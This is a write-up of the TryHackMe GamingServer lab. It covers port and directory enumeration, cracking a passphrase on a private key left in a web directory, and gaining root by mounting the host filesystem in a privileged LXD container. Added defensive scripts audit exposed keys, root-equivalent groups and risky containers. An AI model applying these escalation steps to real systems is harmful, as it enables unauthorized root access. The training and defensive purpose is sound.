WriteUp — THM GamingServer

Jari Laurila
Oct 21, 2020


An Easy Boot2Root box for beginners

This is a WriteUp for TryHackMe Room GamingServer.

Start by adding gamingserver.thm to /etc/hosts so you don't need to type the IP address into every tool.


NMAP

nmap -sC -sV -p- gamingserver.thm
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-21 16:22 EEST
Nmap scan report for gamingserver.thm (10.10.253.186)
Host is up (0.054s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
| 256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_ 256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.17 seconds

Web Server enumeration

gobuster dir -q -w /usr/share/wordlists/dirb/common.txt -u http://gamingserver.thm -t 20 -x php,http,txt
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.http (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.http (Status: 403)
/.hta (Status: 403)
/.hta.http (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/about.php (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)

http://gamingserver.thm/secret/secretKey reveals an encrypted RSA private key.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
[key body omitted]
-----END RSA PRIVATE KEY-----

The page source of http://gamingserver.thm/ reveals a potential username:

<!-- john, please add some actual content to the site! lorem ipsum is horrible to look at. -->

http://gamingserver.thm/uploads/dict.lst reveals a potential password list.
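The root cause on this box is a private key sitting in a web-served directory, and the fact that it is passphrase-protected helps less than it looks: the legacy "Proc-Type: 4,ENCRYPTED / DEK-Info" PEM format derives its cipher key with a single MD5 pass, which is why a wordlist attack on it is cheap. The following is an added defender's audit script, not part of the writeup or the room, that walks a web root, finds any PEM private key, and classifies how it is protected (legacy PEM with weak KDF, unencrypted, or openssh-key-v1 with or without the bcrypt KDF). The sample files it builds are constructed stand-ins, not real keys, and the IV in the DEK-Info line is a placeholder.

```python
"""Added audit helper: find private keys under a web root and say how well each is protected."""
import base64
import os
import re
import struct
import tempfile

PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z ]*?)PRIVATE KEY-----\n(?P<body>.*?)-----END (?P=label)PRIVATE KEY-----",
    re.S,
)

# Once a key has been served over HTTP the only safe move is rotation; the note says how to
# protect the replacement. Legacy PEM encryption = one MD5 pass (EVP_BytesToKey), so guessing is cheap.
ADVICE = {
    "unencrypted": "rotate now; anyone who fetched the file can use it as-is",
    "encrypted-legacy-kdf": "rotate; legacy PEM KDF is a single MD5 pass, regenerate with ssh-keygen -o -a 100",
    "encrypted-bcrypt-kdf": "rotate; the bcrypt KDF slows guessing but does not stop it",
    "encrypted-other": "rotate; inspect the key format by hand",
    "unparseable": "inspect by hand",
}


def classify_key(text):
    """Return (key_format, protection) for the first PEM private key in text, else None."""
    m = PEM_RE.search(text.replace("\r\n", "\n"))
    if m is None:
        return None
    label = m.group("label").strip()  # "RSA", "EC", "OPENSSH", "ENCRYPTED" or "" (PKCS#8)
    body = m.group("body")
    if label == "OPENSSH":
        # openssh-key-v1 layout: magic, then length-prefixed cipher name and KDF name.
        try:
            raw = base64.b64decode("".join(body.split()))
        except ValueError:
            return ("openssh", "unparseable")
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            return ("openssh", "unparseable")
        names, off = [], len(magic)
        for _ in range(2):
            if len(raw) < off + 4:
                return ("openssh", "unparseable")
            (n,) = struct.unpack(">I", raw[off:off + 4])
            names.append(raw[off + 4:off + 4 + n].decode("ascii", "replace"))
            off += 4 + n
        cipher, kdf = names
        if cipher == "none":
            return ("openssh", "unencrypted")
        return ("openssh", "encrypted-bcrypt-kdf" if kdf == "bcrypt" else "encrypted-other")
    # Legacy PEM announces encryption in headers that precede a blank line.
    head = body.split("\n\n", 1)[0]
    if "Proc-Type: 4,ENCRYPTED" in head and "DEK-Info:" in head:
        return ("legacy-pem", "encrypted-legacy-kdf")
    if label == "ENCRYPTED":  # PKCS#8 "BEGIN ENCRYPTED PRIVATE KEY"
        return ("pkcs8", "encrypted-other")
    return ("legacy-pem" if label else "pkcs8", "unencrypted")


def scan_webroot(root, max_bytes=64 * 1024):
    """Return sorted [(relative_path, key_format, protection)] for every file under root holding a key."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    text = fh.read(max_bytes).decode("utf-8", "ignore")
            except OSError:
                continue
            result = classify_key(text)
            if result is not None:
                findings.append((os.path.relpath(path, root).replace(os.sep, "/"),) + result)
    return sorted(findings)


# Constructed samples (not real keys): a legacy-encrypted RSA key with the header layout seen
# on the box (placeholder IV), and openssh-key-v1 stubs carrying only the cipher/KDF names.
SAMPLE_LEGACY = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "cGxhY2Vob2xkZXIgYm9keSwgbm90IGEgcmVhbCBrZXk=\n"
    "-----END RSA PRIVATE KEY-----\n"
)


def openssh_stub(cipher, kdf):
    """Build a minimal openssh-key-v1 PEM carrying only the cipher and KDF names (constructed)."""
    blob = (b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher
            + struct.pack(">I", len(kdf)) + kdf)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode("ascii")
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


SAMPLE_OPENSSH_PLAIN = openssh_stub(b"none", b"none")


def demo():
    """Build a throwaway web root mirroring the layout gobuster found, audit it, return findings."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "secret"))
        os.makedirs(os.path.join(root, "uploads"))
        with open(os.path.join(root, "secret", "secretKey"), "w") as fh:
            fh.write(SAMPLE_LEGACY)
        with open(os.path.join(root, "uploads", "id_ed25519"), "w") as fh:
            fh.write(SAMPLE_OPENSSH_PLAIN)
        with open(os.path.join(root, "index.html"), "w") as fh:
            fh.write("<html><!-- no key here --></html>\n")
        findings = scan_webroot(root)
    for rel, fmt, prot in findings:
        print(f"{rel}: {fmt}, {prot} -> {ADVICE[prot]}")
    return findings


if __name__ == "__main__":
    demo()
```

Point it at a real DocumentRoot with `scan_webroot("/var/www/html")`; anything it reports should be rotated, not just deleted, because the file has already been reachable over HTTP. The `-o -a 100` flags on `ssh-keygen` select the openssh-key-v1 format with 100 bcrypt rounds for the replacement key's passphrase.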

Gaining access

Since the private key is passphrase-protected, we need to crack the passphrase first. Convert the SSH key into a John hash:

/usr/share/john/ssh2john.py secretKey > hash

Then crack it with John the Ripper and the wordlist we found:

john --wordlist=dict.lst hash

SSH into the box using the private key and the recovered passphrase, grab the flag from john's home directory, and move on to rooting the box.

Privesc

Run linPEAS to look for potential privilege-escalation vectors. It turns up only two interesting items, both in the group list:

User & Groups: uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

We are members of the sudo group, which is nice, but we can't use sudo without a password, which we don't have. So what about the other entry?

A quick Google search for "lxd group exploit" turns up a known privilege-escalation path: https://www.hackingarticles.in/lxd-privilege-escalation/
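Membership of the lxd group is root-equivalent by design (the same holds for docker and disk), so the defensive fix is to treat those groups like sudo and review who holds them. Below is an added audit script, not part of the writeup or of linPEAS, that parses /etc/passwd and /etc/group text, combines primary and supplementary groups, and reports non-root users holding a root-equivalent group. The sample input is constructed from the id line above.

```python
"""Added check: report users whose group memberships are root-equivalent."""

# Groups whose membership equals root on a default install: lxd and docker let a member run a
# privileged container with the host filesystem mounted; disk grants raw block-device access;
# sudo/wheel/admin normally map to ALL in sudoers.
ROOT_EQUIVALENT = {"lxd", "docker", "disk", "sudo", "wheel", "admin"}


def parse_group(text):
    """Map group name -> (gid, set of supplementary members) from /etc/group content."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = (line.split(":") + ["", "", ""])[:4]
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_passwd(text):
    """Map user -> primary gid from /etc/passwd content."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 4:
            users[fields[0]] = int(fields[3])
    return users


def memberships(passwd_text, group_text):
    """Return user -> sorted list of all groups (primary plus supplementary)."""
    groups = parse_group(group_text)
    gid_to_name = {gid: name for name, (gid, _members) in groups.items()}
    result = {}
    for user, gid in parse_passwd(passwd_text).items():
        result[user] = {gid_to_name[gid]} if gid in gid_to_name else set()
    for name, (_gid, members) in groups.items():
        for member in members:
            result.setdefault(member, set()).add(name)
    return {user: sorted(gs) for user, gs in result.items()}


def root_equivalent_users(passwd_text, group_text):
    """Return {user: [risky groups]} for every non-root user holding a root-equivalent group."""
    findings = {}
    for user, gs in memberships(passwd_text, group_text).items():
        risky = sorted(set(gs) & ROOT_EQUIVALENT)
        if risky and user != "root":
            findings[user] = risky
    return findings


# Constructed sample files reproducing the group list from the linPEAS output above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:john:/home/john:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""
SAMPLE_GROUP = """root:x:0:
adm:x:4:syslog,john
cdrom:x:24:john
sudo:x:27:john
dip:x:30:john
www-data:x:33:
plugdev:x:46:john
lxd:x:108:john
john:x:1000:
"""

if __name__ == "__main__":
    for user, risky in root_equivalent_users(SAMPLE_PASSWD, SAMPLE_GROUP).items():
        print(f"{user}: {', '.join(risky)} -> remove with gpasswd -d, or record why it is needed")
```

On a live host feed it the real files with `root_equivalent_users(open("/etc/passwd").read(), open("/etc/group").read())`. Removing a user from the lxd group with `gpasswd -d john lxd` closes the path used in this room; the user keeps sudo membership only if that is actually intended.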

Build an alpine container:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Copy it to the target box:

scp -i secretKey lxd-alpine-builder/alpine-v3.12-x86_64-20201021_1657.tar.gz john@gamingserver.thm:/home/john

Import the image:

lxc image import ./alpine-v3.12-x86_64-20201021_1657.tar.gz --alias myimage
Image imported with fingerprint: 0c08ba5b0e28f14a8c8b5508297af9c32eed8d26a30986c50187eff608a996ba

Start it up and get the flag:

lxc init myimage ignite -c security.privileged=true
Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/root
/mnt/root/root # cat root.txt
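The two settings that make this work, `security.privileged=true` and a disk device with `source=/`, are visible in LXD's own inventory, so a defender can spot such a container after the fact. The following is an added detection script, not part of the writeup or of LXD, that reads the JSON printed by `lxc list --format json` and flags any container combining those two properties. The sample document is constructed to match the container built above; the field names (`name`, `config`, `devices`, and the profile-merged `expanded_config` / `expanded_devices`) are assumed to match LXD's JSON output.

```python
"""Added detection: flag LXD containers that are privileged and mount the host root."""
import json


def is_true(value):
    """LXD stores booleans as strings; accept the usual spellings."""
    return str(value).strip().lower() in ("true", "1", "yes")


def host_root_mounts(devices):
    """Return names of disk devices whose source is the host filesystem root."""
    found = []
    for name, dev in devices.items():
        src = dev.get("source")
        if dev.get("type") == "disk" and src is not None and src.rstrip("/") == "":
            found.append(name)
    return sorted(found)


def audit_containers(lxc_list_json):
    """Return [(container name, [reasons])] for containers that look like escalation vehicles."""
    findings = []
    for c in json.loads(lxc_list_json):
        # Merge profile-inherited settings (expanded_*) over the container's own settings.
        config = {**c.get("config", {}), **c.get("expanded_config", {})}
        devices = {**c.get("devices", {}), **c.get("expanded_devices", {})}
        reasons = []
        if is_true(config.get("security.privileged", "false")):
            reasons.append("security.privileged=true")
        for name in host_root_mounts(devices):
            reasons.append(f"device {name} mounts host / at {devices[name].get('path')}")
        if reasons:
            findings.append((c["name"], reasons))
    return findings


# Constructed sample in the shape of `lxc list --format json` (field names assumed):
# "ignite" mirrors the container from the writeup, "web" is a normal unprivileged container.
SAMPLE_LXC_LIST = json.dumps([
    {"name": "ignite", "config": {"security.privileged": "true"},
     "devices": {"mydevice": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"}}},
    {"name": "web", "config": {},
     "devices": {"root": {"type": "disk", "path": "/", "pool": "default"}}},
])

if __name__ == "__main__":
    for name, reasons in audit_containers(SAMPLE_LXC_LIST):
        print(f"{name}: {'; '.join(reasons)}")
```

Either property on its own deserves a look, which is why the script reports them separately; a container showing both is the pattern from this room and should be stopped and investigated along with the lxd group membership that allowed it to be created.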

That’s all folks!
